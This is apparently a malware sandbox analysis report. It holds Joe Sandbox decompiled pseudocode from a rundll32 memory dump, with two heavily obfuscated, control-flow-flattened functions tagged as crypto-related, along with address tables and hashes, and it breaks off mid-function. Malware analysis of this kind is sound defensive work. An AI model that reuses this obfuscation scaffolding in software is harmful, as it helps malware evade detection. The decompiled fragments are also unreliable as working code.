                                                                                                                      0x0082e74c
                                                                                                                      0x0082e761
                                                                                                                      0x0082e764
                                                                                                                      0x0082e76b
                                                                                                                      0x0082e773
                                                                                                                      0x0082e77e
                                                                                                                      0x0082e786
                                                                                                                      0x0082e78e
                                                                                                                      0x0082e796
                                                                                                                      0x0082e79e
                                                                                                                      0x0082e7a6
                                                                                                                      0x0082e7b1
                                                                                                                      0x0082e7c7
                                                                                                                      0x0082e7ce
                                                                                                                      0x0082e7d9
                                                                                                                      0x0082e7e1
                                                                                                                      0x0082e7e9
                                                                                                                      0x0082e7f1
                                                                                                                      0x0082e7f9
                                                                                                                      0x0082e801
                                                                                                                      0x0082e80c
                                                                                                                      0x0082e817
                                                                                                                      0x0082e81f
                                                                                                                      0x0082e82a
                                                                                                                      0x0082e835
                                                                                                                      0x0082e840
                                                                                                                      0x0082e84b
                                                                                                                      0x0082e853
                                                                                                                      0x0082e85d
                                                                                                                      0x0082e860
                                                                                                                      0x0082e864
                                                                                                                      0x0082e86c
                                                                                                                      0x0082e874
                                                                                                                      0x0082e87c
                                                                                                                      0x0082e881
                                                                                                                      0x0082e88e
                                                                                                                      0x0082e892
                                                                                                                      0x0082e89a
                                                                                                                      0x0082e8a6
                                                                                                                      0x0082e8ab
                                                                                                                      0x0082e8b1
                                                                                                                      0x0082e8b9
                                                                                                                      0x0082e8be
                                                                                                                      0x0082e8c6
                                                                                                                      0x0082e8d8
                                                                                                                      0x0082e8db
                                                                                                                      0x0082e8e2
                                                                                                                      0x0082e8ea
                                                                                                                      0x0082e8f5
                                                                                                                      0x0082e8fd
                                                                                                                      0x0082e902
                                                                                                                      0x0082e90b
                                                                                                                      0x0082e90f
                                                                                                                      0x0082e917
                                                                                                                      0x0082e922
                                                                                                                      0x0082e922
                                                                                                                      0x0082e922
                                                                                                                      0x0082e927
                                                                                                                      0x0082e927
                                                                                                                      0x0082e927
                                                                                                                      0x0082e927
                                                                                                                      0x0082e92d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0082e933
                                                                                                                      0x0082eaab
                                                                                                                      0x0082eaac
                                                                                                                      0x0082eab2
                                                                                                                      0x0082eab7
                                                                                                                      0x0082eabd
                                                                                                                      0x0082eac3
                                                                                                                      0x00000000
                                                                                                                      0x0082eac3
                                                                                                                      0x0082e939
                                                                                                                      0x0082e93f
                                                                                                                      0x0082ea6e
                                                                                                                      0x0082ea73
                                                                                                                      0x0082ea77
                                                                                                                      0x0082ea7c
                                                                                                                      0x0082ea8c
                                                                                                                      0x0082ea91
                                                                                                                      0x00000000
                                                                                                                      0x0082e945
                                                                                                                      0x0082e94b
                                                                                                                      0x0082ea2a
                                                                                                                      0x0082ea2b
                                                                                                                      0x0082ea36
                                                                                                                      0x0082ea46
                                                                                                                      0x00000000
                                                                                                                      0x0082e951
                                                                                                                      0x0082e957
                                                                                                                      0x0082ea03
                                                                                                                      0x0082ea08
                                                                                                                      0x0082ea10
                                                                                                                      0x00000000
                                                                                                                      0x0082e95d
                                                                                                                      0x0082e964
                                                                                                                      0x0082e9e9
                                                                                                                      0x0082e9ee
                                                                                                                      0x0082e9f1
                                                                                                                      0x0082e9f1
                                                                                                                      0x0082e9f6
                                                                                                                      0x0082e9fa
                                                                                                                      0x0082e9fa
                                                                                                                      0x00000000
                                                                                                                      0x0082e966
                                                                                                                      0x0082e968
                                                                                                                      0x0082e999
                                                                                                                      0x0082e9c0
                                                                                                                      0x0082e9ca
                                                                                                                      0x0082e9cf
                                                                                                                      0x0082ebd8
                                                                                                                      0x0082ebd8
                                                                                                                      0x0082ebdc
                                                                                                                      0x0082ebdc
                                                                                                                      0x00000000
                                                                                                                      0x0082e968
                                                                                                                      0x0082e964
                                                                                                                      0x0082e957
                                                                                                                      0x0082e94b
                                                                                                                      0x0082e93f
                                                                                                                      0x00000000
                                                                                                                      0x0082e933
                                                                                                                      0x0082ead3
                                                                                                                      0x0082ebcb
                                                                                                                      0x0082ebd0
                                                                                                                      0x0082ebd3
                                                                                                                      0x00000000
                                                                                                                      0x0082ead9
                                                                                                                      0x0082eadf
                                                                                                                      0x0082eb72
                                                                                                                      0x0082eb79
                                                                                                                      0x0082eb7e
                                                                                                                      0x0082eb83
                                                                                                                      0x00000000
                                                                                                                      0x0082eb89
                                                                                                                      0x0082eb8d
                                                                                                                      0x0082eb95
                                                                                                                      0x0082ebab
                                                                                                                      0x0082ebaf
                                                                                                                      0x00000000
                                                                                                                      0x0082ebaf
                                                                                                                      0x00000000
                                                                                                                      0x0082eae1
                                                                                                                      0x0082eae7
                                                                                                                      0x0082eb1e
                                                                                                                      0x00000000
                                                                                                                      0x0082eae9
                                                                                                                      0x0082eaef
                                                                                                                      0x00000000
                                                                                                                      0x0082eaf5
                                                                                                                      0x0082eb0c
                                                                                                                      0x0082eb11
                                                                                                                      0x0082eb14
                                                                                                                      0x00000000
                                                                                                                      0x0082eb14
                                                                                                                      0x0082eaef
                                                                                                                      0x0082eae7
                                                                                                                      0x0082eadf
                                                                                                                      0x00000000
                                                                                                                      0x0082ebe1
                                                                                                                      0x0082ebe1
                                                                                                                      0x0082ebe5
                                                                                                                      0x0082ebfb
                                                                                                                      0x0082ebfb
                                                                                                                      0x00000000
                                                                                                                      0x0082ebfb

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #A/Z$3m0$5$7_Z$?kd$Dr$E*X$E*X$Yb$eo$|MC
                                                                                                                      • API String ID: 0-1059594742
                                                                                                                      • Opcode ID: 17c914c607d4fd6e8b14c60ccda3ed0ff62bbfef5d0e6b580ac1b24a080d4d8a
                                                                                                                      • Instruction ID: cc9d7666e5a42b9b1d45412138da64cff6873f0e17663281ed660693d61439bf
                                                                                                                      • Opcode Fuzzy Hash: 17c914c607d4fd6e8b14c60ccda3ed0ff62bbfef5d0e6b580ac1b24a080d4d8a
                                                                                                                      • Instruction Fuzzy Hash: 57222F719083808FE7A8CF25D58AA4BFBE1FBC4314F108A1DE5DA96260D7B19949CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00816F82 Relevance: 12.8, Strings: 10, Instructions: 339COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E00816F82(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _t404;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t430;
				void* _t463;
				void* _t464;
				signed int* _t468;

				_t468 =  &_v2776;
				_v2716 = 0x9827f0;
				_v2716 = _v2716 << 9;
				_v2716 = _v2716 >> 4;
				_v2716 = _v2716 ^ 0x0304fe29;
				_v2684 = 0x251356;
				_v2684 = _v2684 + 0x1e2;
				_v2684 = _v2684 | 0xda75bfb2;
				_v2684 = _v2684 ^ 0xda7428eb;
				_v2768 = 0x24e368;
				_v2768 = _v2768 ^ 0xd5a17b15;
				_v2768 = _v2768 << 7;
				_v2768 = _v2768 | 0xced33043;
				_v2768 = _v2768 ^ 0xced6ff80;
				_v2736 = 0xa2f196;
				_v2736 = _v2736 + 0x6d02;
				_v2736 = _v2736 << 8;
				_v2736 = _v2736 * 0x63;
				_t463 = __ecx;
				_v2736 = _v2736 ^ 0x2d971c6c;
				_t464 = 0x422d362;
				_v2760 = 0x391c44;
				_v2760 = _v2760 >> 0x10;
				_v2760 = _v2760 + 0xe88b;
				_v2760 = _v2760 + 0x506d;
				_v2760 = _v2760 ^ 0x00052d5d;
				_v2744 = 0x960a81;
				_t421 = 3;
				_v2744 = _v2744 * 0x47;
				_v2744 = _v2744 * 0x66;
				_v2744 = _v2744 + 0x35e4;
				_v2744 = _v2744 ^ 0x94845397;
				_v2604 = 0xe8b0f5;
				_v2604 = _v2604 + 0x9847;
				_v2604 = _v2604 ^ 0x00e1425b;
				_v2712 = 0x9aefe1;
				_v2712 = _v2712 + 0x2d7a;
				_v2712 = _v2712 | 0x79d44310;
				_v2712 = _v2712 ^ 0x79db8805;
				_v2728 = 0x1377c5;
				_v2728 = _v2728 | 0x6e97ff53;
				_v2728 = _v2728 + 0x22de;
				_v2728 = _v2728 ^ 0x6e9b6172;
				_v2752 = 0xb1335e;
				_v2752 = _v2752 ^ 0x2dbaf336;
				_v2752 = _v2752 / _t421;
				_v2752 = _v2752 ^ 0xfe92c193;
				_v2752 = _v2752 ^ 0xf19577cc;
				_v2660 = 0x2952e4;
				_v2660 = _v2660 | 0x79708fb3;
				_v2660 = _v2660 ^ 0x797ec65d;
				_v2680 = 0x48d1a6;
				_t422 = 0x34;
				_v2680 = _v2680 / _t422;
				_v2680 = _v2680 * 0x69;
				_v2680 = _v2680 ^ 0x0099bc36;
				_v2612 = 0xcdd72a;
				_v2612 = _v2612 * 0x50;
				_v2612 = _v2612 ^ 0x4054338c;
				_v2672 = 0x8e3222;
				_v2672 = _v2672 << 1;
				_v2672 = _v2672 ^ 0x0115b014;
				_v2772 = 0xea36ba;
				_v2772 = _v2772 + 0xffff2869;
				_v2772 = _v2772 >> 2;
				_v2772 = _v2772 ^ 0xcd7b9291;
				_v2772 = _v2772 ^ 0xcd4b3afc;
				_v2776 = 0x8f99fe;
				_v2776 = _v2776 + 0x5190;
				_v2776 = _v2776 + 0xffffc7d6;
				_v2776 = _v2776 ^ 0x0f761f96;
				_v2776 = _v2776 ^ 0x0ff50908;
				_v2652 = 0xb833cd;
				_t423 = 0x31;
				_v2652 = _v2652 * 0x75;
				_v2652 = _v2652 ^ 0x5422af3f;
				_v2620 = 0x8c6cc6;
				_v2620 = _v2620 + 0xffff9da6;
				_v2620 = _v2620 ^ 0x008df9f5;
				_v2688 = 0x40b504;
				_v2688 = _v2688 ^ 0xc3e337a5;
				_v2688 = _v2688 + 0x808c;
				_v2688 = _v2688 ^ 0xc3a77743;
				_v2704 = 0x4030d0;
				_v2704 = _v2704 | 0xd8d5f091;
				_v2704 = _v2704 ^ 0xb4a4ac2b;
				_v2704 = _v2704 ^ 0x6c7bdbfc;
				_v2644 = 0xafd4ef;
				_v2644 = _v2644 * 0x3b;
				_v2644 = _v2644 ^ 0x288fb790;
				_v2764 = 0x1d91e2;
				_v2764 = _v2764 | 0xd96eda72;
				_v2764 = _v2764 + 0xffffbbe3;
				_v2764 = _v2764 >> 0xc;
				_v2764 = _v2764 ^ 0x000d90f8;
				_v2696 = 0x4b7a41;
				_v2696 = _v2696 | 0xbfeeeeed;
				_v2696 = _v2696 ^ 0xbfe32e95;
				_v2708 = 0x8f6339;
				_v2708 = _v2708 | 0xa71a0417;
				_v2708 = _v2708 + 0xffff51d8;
				_v2708 = _v2708 ^ 0xa79b9aa8;
				_v2636 = 0x12e7d6;
				_v2636 = _v2636 * 0x21;
				_v2636 = _v2636 ^ 0x026e6de9;
				_v2756 = 0xd5c5d;
				_v2756 = _v2756 ^ 0x716456fc;
				_v2756 = _v2756 + 0xa334;
				_v2756 = _v2756 >> 0xc;
				_v2756 = _v2756 ^ 0x000918e1;
				_v2608 = 0xbb78a7;
				_v2608 = _v2608 + 0xd6b3;
				_v2608 = _v2608 ^ 0x00b2dabe;
				_v2668 = 0xad3636;
				_v2668 = _v2668 + 0xffffa01e;
				_v2668 = _v2668 ^ 0x00a02f3e;
				_v2628 = 0x4494fc;
				_v2628 = _v2628 / _t423;
				_v2628 = _v2628 ^ 0x0009fca5;
				_v2748 = 0x660e04;
				_v2748 = _v2748 + 0xffffa723;
				_v2748 = _v2748 | 0x67469fe4;
				_t424 = 0x4b;
				_v2748 = _v2748 * 5;
				_v2748 = _v2748 ^ 0x050bc0b3;
				_v2616 = 0xd4c89d;
				_v2616 = _v2616 << 7;
				_v2616 = _v2616 ^ 0x6a6fac0f;
				_v2700 = 0xaa08c8;
				_v2700 = _v2700 + 0xffffd108;
				_v2700 = _v2700 / _t424;
				_v2700 = _v2700 ^ 0x0001fda8;
				_v2732 = 0x67cb1c;
				_v2732 = _v2732 << 5;
				_v2732 = _v2732 | 0x2b3c2ffa;
				_v2732 = _v2732 ^ 0x295e7aa1;
				_v2732 = _v2732 ^ 0x06a01d44;
				_v2656 = 0xfaf065;
				_v2656 = _v2656 + 0xffff35fd;
				_v2656 = _v2656 ^ 0x00f58676;
				_v2740 = 0x2bd94;
				_v2740 = _v2740 + 0x3f47;
				_t425 = 0x2a;
				_v2740 = _v2740 / _t425;
				_v2740 = _v2740 ^ 0xca3749d7;
				_v2740 = _v2740 ^ 0xca3fc9be;
				_v2664 = 0x3942c4;
				_v2664 = _v2664 << 0xe;
				_v2664 = _v2664 ^ 0x50bf8d15;
				_v2724 = 0xb2ae33;
				_t426 = 0x22;
				_v2724 = _v2724 / _t426;
				_v2724 = _v2724 << 1;
				_v2724 = _v2724 ^ 0x6c628229;
				_v2724 = _v2724 ^ 0x6c6ae222;
				_v2640 = 0xd32362;
				_v2640 = _v2640 + 0xffff88f4;
				_v2640 = _v2640 ^ 0x00d4f71b;
				_v2648 = 0x3e5b4d;
				_v2648 = _v2648 + 0x4f8c;
				_v2648 = _v2648 ^ 0x003b681e;
				_v2676 = 0xc6bb8b;
				_v2676 = _v2676 << 4;
				_t427 = 0x14;
				_v2676 = _v2676 / _t427;
				_v2676 = _v2676 ^ 0x009ad4f5;
				_v2720 = 0xa3b34d;
				_v2720 = _v2720 + 0xffff97dd;
				_v2720 = _v2720 | 0x7136ebef;
				_v2720 = _v2720 ^ 0x71b8bb4e;
				_v2692 = 0xa7ff58;
				_t404 = _v2692 * 0x31;
				_v2692 = _t404;
				_v2692 = _v2692 >> 4;
				_v2692 = _v2692 ^ 0x020bdfc2;
				_v2624 = 0xa501ce;
				_v2624 = _v2624 | 0xdc20330f;
				_v2624 = _v2624 ^ 0xdca3e6f8;
				_v2632 = 0xa992b7;
				_v2632 = _v2632 | 0x4e4d69fe;
				_v2632 = _v2632 ^ 0x4ee71179;
				while(_t464 != 0x2953b22) {
					if(_t464 == 0x422d362) {
						_t464 = 0xe704baa;
						continue;
					} else {
						_t475 = _t464 - 0xe704baa;
						if(_t464 != 0xe704baa) {
							L8:
							__eflags = _t464 - 0x740d40c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E008306A8(_t427, _v2684, _t475, _v2768, _v2736,  &_v2600);
							 *((short*)(E008243A8(_v2760,  &_v2600, _v2744, _v2604))) = 0;
							E00817A50(_v2712,  &_v1560, _t475, _v2728);
							_push(_v2612);
							_push(_v2680);
							_push(0x1000181c);
							E0081DBCE(E00819F66(_v2752, _v2660, _t475), _t475, _v2672,  &_v2600, _v2752, _v2772, _v2776, _v2652, _v2620,  &_v1560);
							E0081A203(_v2688, _v2704, _v2644, _t415);
							_t427 = _v2764;
							_t404 = E0082B78F(_t427,  &_v2080, _t463, _v2696);
							_t468 =  &(_t468[0x15]);
							if(_t404 != 0) {
								_t464 = 0x2953b22;
								continue;
							}
						}
					}
					return _t404;
				}
				_push(_t427);
				E0081DE7B( &_v1040, _v2708, _v2716, _t427, _v2636, _v2756, _v2608);
				_push(_v2616);
				_push(_v2748);
				_push(0x100018cc);
				E0081DBCE(E00819F66(_v2668, _v2628, __eflags), __eflags, _v2700,  &_v1040, _v2668, _v2732, _v2656, _v2740, _v2664,  &_v2080);
				_t430 = _v2724;
				E0081A203(_t430, _v2640, _v2648, _t406);
				_push(_v2632);
				_push(_v2624);
				_push(_v2692);
				_push(0);
				_push(0);
				_push(_v2720);
				_push(_t430);
				_push(0);
				_t427 =  &_v520;
				_t404 = E00818B00(_t427, _v2676, __eflags);
				_t468 =  &(_t468[0x1c]);
				_t464 = 0x740d40c;
				goto L8;
			}
































































                                                                                                                      0x00816f82
                                                                                                                      0x00816f88
                                                                                                                      0x00816f92
                                                                                                                      0x00816f97
                                                                                                                      0x00816f9c
                                                                                                                      0x00816fa4
                                                                                                                      0x00816fac
                                                                                                                      0x00816fb4
                                                                                                                      0x00816fbc
                                                                                                                      0x00816fc4
                                                                                                                      0x00816fcc
                                                                                                                      0x00816fd4
                                                                                                                      0x00816fd9
                                                                                                                      0x00816fe1
                                                                                                                      0x00816fe9
                                                                                                                      0x00816ff1
                                                                                                                      0x00816ff9
                                                                                                                      0x00817008
                                                                                                                      0x0081700c
                                                                                                                      0x0081700e
                                                                                                                      0x00817016
                                                                                                                      0x0081701b
                                                                                                                      0x00817023
                                                                                                                      0x00817028
                                                                                                                      0x00817030
                                                                                                                      0x00817038
                                                                                                                      0x00817040
                                                                                                                      0x0081704d
                                                                                                                      0x00817050
                                                                                                                      0x00817059
                                                                                                                      0x0081705d
                                                                                                                      0x00817065
                                                                                                                      0x0081706d
                                                                                                                      0x00817078
                                                                                                                      0x00817083
                                                                                                                      0x0081708e
                                                                                                                      0x00817096
                                                                                                                      0x0081709e
                                                                                                                      0x008170a6
                                                                                                                      0x008170ae
                                                                                                                      0x008170b6
                                                                                                                      0x008170be
                                                                                                                      0x008170c6
                                                                                                                      0x008170ce
                                                                                                                      0x008170d6
                                                                                                                      0x008170e6
                                                                                                                      0x008170ea
                                                                                                                      0x008170f2
                                                                                                                      0x008170fa
                                                                                                                      0x00817105
                                                                                                                      0x00817110
                                                                                                                      0x0081711b
                                                                                                                      0x00817127
                                                                                                                      0x0081712a
                                                                                                                      0x00817133
                                                                                                                      0x00817137
                                                                                                                      0x0081713f
                                                                                                                      0x00817152
                                                                                                                      0x00817159
                                                                                                                      0x00817164
                                                                                                                      0x0081716c
                                                                                                                      0x00817170
                                                                                                                      0x00817178
                                                                                                                      0x00817180
                                                                                                                      0x00817188
                                                                                                                      0x0081718d
                                                                                                                      0x00817195
                                                                                                                      0x0081719f
                                                                                                                      0x008171a7
                                                                                                                      0x008171af
                                                                                                                      0x008171b7
                                                                                                                      0x008171bf
                                                                                                                      0x008171c7
                                                                                                                      0x008171dc
                                                                                                                      0x008171df
                                                                                                                      0x008171e6
                                                                                                                      0x008171f1
                                                                                                                      0x008171fc
                                                                                                                      0x00817207
                                                                                                                      0x00817212
                                                                                                                      0x0081721a
                                                                                                                      0x00817222
                                                                                                                      0x0081722a
                                                                                                                      0x00817232
                                                                                                                      0x0081723a
                                                                                                                      0x00817242
                                                                                                                      0x0081724a
                                                                                                                      0x00817252
                                                                                                                      0x00817265
                                                                                                                      0x0081726c
                                                                                                                      0x00817277
                                                                                                                      0x0081727f
                                                                                                                      0x00817287
                                                                                                                      0x0081728f
                                                                                                                      0x00817294
                                                                                                                      0x0081729c
                                                                                                                      0x008172a4
                                                                                                                      0x008172ac
                                                                                                                      0x008172b4
                                                                                                                      0x008172bc
                                                                                                                      0x008172c4
                                                                                                                      0x008172cc
                                                                                                                      0x008172d4
                                                                                                                      0x008172e7
                                                                                                                      0x008172ee
                                                                                                                      0x008172f9
                                                                                                                      0x00817301
                                                                                                                      0x00817309
                                                                                                                      0x00817311
                                                                                                                      0x00817316
                                                                                                                      0x0081731e
                                                                                                                      0x00817329
                                                                                                                      0x00817334
                                                                                                                      0x0081733f
                                                                                                                      0x00817347
                                                                                                                      0x0081734f
                                                                                                                      0x00817357
                                                                                                                      0x0081736d
                                                                                                                      0x00817374
                                                                                                                      0x0081737f
                                                                                                                      0x00817387
                                                                                                                      0x0081738f
                                                                                                                      0x0081739c
                                                                                                                      0x0081739d
                                                                                                                      0x008173a1
                                                                                                                      0x008173a9
                                                                                                                      0x008173b4
                                                                                                                      0x008173bc
                                                                                                                      0x008173c7
                                                                                                                      0x008173cf
                                                                                                                      0x008173dd
                                                                                                                      0x008173e1
                                                                                                                      0x008173e9
                                                                                                                      0x008173f1
                                                                                                                      0x008173f6
                                                                                                                      0x008173fe
                                                                                                                      0x00817408
                                                                                                                      0x00817415
                                                                                                                      0x00817420
                                                                                                                      0x0081742b
                                                                                                                      0x00817436
                                                                                                                      0x0081743e
                                                                                                                      0x0081744c
                                                                                                                      0x00817451
                                                                                                                      0x00817457
                                                                                                                      0x0081745f
                                                                                                                      0x00817467
                                                                                                                      0x00817472
                                                                                                                      0x0081747a
                                                                                                                      0x00817485
                                                                                                                      0x00817491
                                                                                                                      0x00817496
                                                                                                                      0x0081749c
                                                                                                                      0x008174a0
                                                                                                                      0x008174a8
                                                                                                                      0x008174b0
                                                                                                                      0x008174bb
                                                                                                                      0x008174c6
                                                                                                                      0x008174d1
                                                                                                                      0x008174dc
                                                                                                                      0x008174e7
                                                                                                                      0x008174f2
                                                                                                                      0x008174fa
                                                                                                                      0x00817503
                                                                                                                      0x00817506
                                                                                                                      0x0081750a
                                                                                                                      0x00817512
                                                                                                                      0x0081751a
                                                                                                                      0x00817522
                                                                                                                      0x0081752a
                                                                                                                      0x00817532
                                                                                                                      0x0081753a
                                                                                                                      0x0081753f
                                                                                                                      0x00817543
                                                                                                                      0x00817548
                                                                                                                      0x00817550
                                                                                                                      0x0081755b
                                                                                                                      0x00817566
                                                                                                                      0x00817571
                                                                                                                      0x0081757c
                                                                                                                      0x00817587
                                                                                                                      0x00817592
                                                                                                                      0x008175a0
                                                                                                                      0x008176a5
                                                                                                                      0x00000000
                                                                                                                      0x008175a6
                                                                                                                      0x008175a6
                                                                                                                      0x008175ac
                                                                                                                      0x0081778b
                                                                                                                      0x0081778b
                                                                                                                      0x00817791
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x008175b2
                                                                                                                      0x008175c6
                                                                                                                      0x008175f3
                                                                                                                      0x008175fa
                                                                                                                      0x008175ff
                                                                                                                      0x00817606
                                                                                                                      0x00817618
                                                                                                                      0x0081765e
                                                                                                                      0x00817676
                                                                                                                      0x00817682
                                                                                                                      0x0081768e
                                                                                                                      0x00817693
                                                                                                                      0x00817698
                                                                                                                      0x0081769e
                                                                                                                      0x00000000
                                                                                                                      0x0081769e
                                                                                                                      0x00817698
                                                                                                                      0x008175ac
                                                                                                                      0x008177a0
                                                                                                                      0x008177a0
                                                                                                                      0x008176af
                                                                                                                      0x008176d2
                                                                                                                      0x008176d7
                                                                                                                      0x008176de
                                                                                                                      0x008176f0
                                                                                                                      0x00817733
                                                                                                                      0x00817747
                                                                                                                      0x0081774b
                                                                                                                      0x00817753
                                                                                                                      0x0081775a
                                                                                                                      0x00817761
                                                                                                                      0x00817765
                                                                                                                      0x00817767
                                                                                                                      0x00817769
                                                                                                                      0x00817774
                                                                                                                      0x00817775
                                                                                                                      0x00817777
                                                                                                                      0x0081777e
                                                                                                                      0x00817783
                                                                                                                      0x00817786
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: AzK$G?$M[>$[B$]\$h$$mP$z-$R)$6q
                                                                                                                      • API String ID: 0-2334141070
                                                                                                                      • Opcode ID: 7010b2d2785b72a82f397ea71a3134ee213cfbbb0747ae9a5c21a1b002e3c2f6
                                                                                                                      • Instruction ID: 67c070c727ce2f90babb74e710bcee29b0bdd1b3538cbc8f141f200ad010465f
                                                                                                                      • Opcode Fuzzy Hash: 7010b2d2785b72a82f397ea71a3134ee213cfbbb0747ae9a5c21a1b002e3c2f6
                                                                                                                      • Instruction Fuzzy Hash: 1612FFB150C3819FD3A8CF21C58AA8BBBE1BBC5358F108A1DE1D996260D7B18949CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 008268DD Relevance: 12.8, Strings: 10, Instructions: 335COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E008268DD() {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				unsigned int _v128;
				unsigned int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				void* _t373;
				signed int* _t377;
				signed int _t381;
				signed int _t383;
				signed int* _t384;
				void* _t385;
				intOrPtr _t396;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				void* _t409;
				signed int* _t444;
				void* _t452;
				signed int* _t456;

				_t456 =  &_v152;
				_v8 = 0x511491;
				_t396 = 0;
				_t452 = 0x68b0bf3;
				_v4 = 0;
				_v108 = 0xf5425d;
				_t398 = 0x24;
				_v108 = _v108 / _t398;
				_v108 = _v108 | 0xbb3a7fab;
				_v108 = _v108 ^ 0xbb3effbb;
				_v132 = 0xf54152;
				_v132 = _v132 + 0x73b9;
				_v132 = _v132 | 0x673a86bd;
				_v132 = _v132 >> 4;
				_v132 = _v132 ^ 0x067ffb7b;
				_v36 = 0x17d741;
				_v36 = _v36 << 0xe;
				_v36 = _v36 ^ 0xf5d04000;
				_v72 = 0xb99ed8;
				_t399 = 0x74;
				_v72 = _v72 * 0x57;
				_v72 = _v72 ^ 0x28cb8c28;
				_v72 = _v72 ^ 0x17df7740;
				_v100 = 0xb82182;
				_v100 = _v100 >> 2;
				_v100 = _v100 | 0xc07135d2;
				_v100 = _v100 ^ 0xc07f3df2;
				_v120 = 0x71fefc;
				_v120 = _v120 ^ 0x3c3b57cf;
				_v120 = _v120 ^ 0xde073c70;
				_v120 = _v120 + 0xffffefcb;
				_v120 = _v120 ^ 0xe24618f4;
				_v128 = 0x9b3c32;
				_v128 = _v128 >> 0xb;
				_v128 = _v128 ^ 0x48395a77;
				_v128 = _v128 >> 0xf;
				_v128 = _v128 ^ 0x000e9da5;
				_v136 = 0x52cc3f;
				_v136 = _v136 * 0x6b;
				_v136 = _v136 ^ 0x9c4f2321;
				_v136 = _v136 | 0xfd912896;
				_v136 = _v136 ^ 0xffd2684a;
				_v48 = 0x5298d7;
				_v48 = _v48 ^ 0x46ea6646;
				_v48 = _v48 ^ 0x46b0922b;
				_v112 = 0xeb4fde;
				_v112 = _v112 / _t399;
				_v112 = _v112 >> 0xc;
				_t400 = 0x56;
				_v112 = _v112 / _t400;
				_v112 = _v112 ^ 0x0003a7ac;
				_v52 = 0x2cac0;
				_v52 = _v52 + 0x2e2d;
				_v52 = _v52 ^ 0x00080243;
				_v124 = 0x3dbea4;
				_v124 = _v124 + 0x560a;
				_v124 = _v124 >> 0x10;
				_v124 = _v124 >> 9;
				_v124 = _v124 ^ 0x00027af4;
				_v56 = 0x4e9164;
				_v56 = _v56 >> 0xd;
				_v56 = _v56 ^ 0x00077014;
				_v28 = 0x1ac9f;
				_v28 = _v28 << 7;
				_v28 = _v28 ^ 0x00d40977;
				_v148 = 0xc87974;
				_t401 = 0xf;
				_v148 = _v148 / _t401;
				_v148 = _v148 + 0x3bc4;
				_v148 = _v148 >> 2;
				_v148 = _v148 ^ 0x0004ff8e;
				_v140 = 0x51bf99;
				_v140 = _v140 + 0x1f0d;
				_v140 = _v140 | 0x6ce4c515;
				_v140 = _v140 << 7;
				_v140 = _v140 ^ 0x7aef3c21;
				_v64 = 0x9041a6;
				_v64 = _v64 | 0xf9fd38a0;
				_v64 = _v64 + 0x56fc;
				_v64 = _v64 ^ 0xf9f31663;
				_v96 = 0xb1a19;
				_v96 = _v96 + 0x5234;
				_t402 = 0x68;
				_v96 = _v96 * 0x32;
				_v96 = _v96 ^ 0x0237c494;
				_v152 = 0x354a37;
				_v152 = _v152 | 0x37184972;
				_v152 = _v152 ^ 0x144b30cb;
				_v152 = _v152 * 0x1f;
				_v152 = _v152 ^ 0x4b54d1c6;
				_v116 = 0xf3726e;
				_v116 = _v116 + 0xcc69;
				_v116 = _v116 >> 3;
				_v116 = _v116 + 0x674b;
				_v116 = _v116 ^ 0x001624aa;
				_v44 = 0x3b88ac;
				_v44 = _v44 / _t402;
				_v44 = _v44 ^ 0x00096110;
				_v20 = 0x83fd7f;
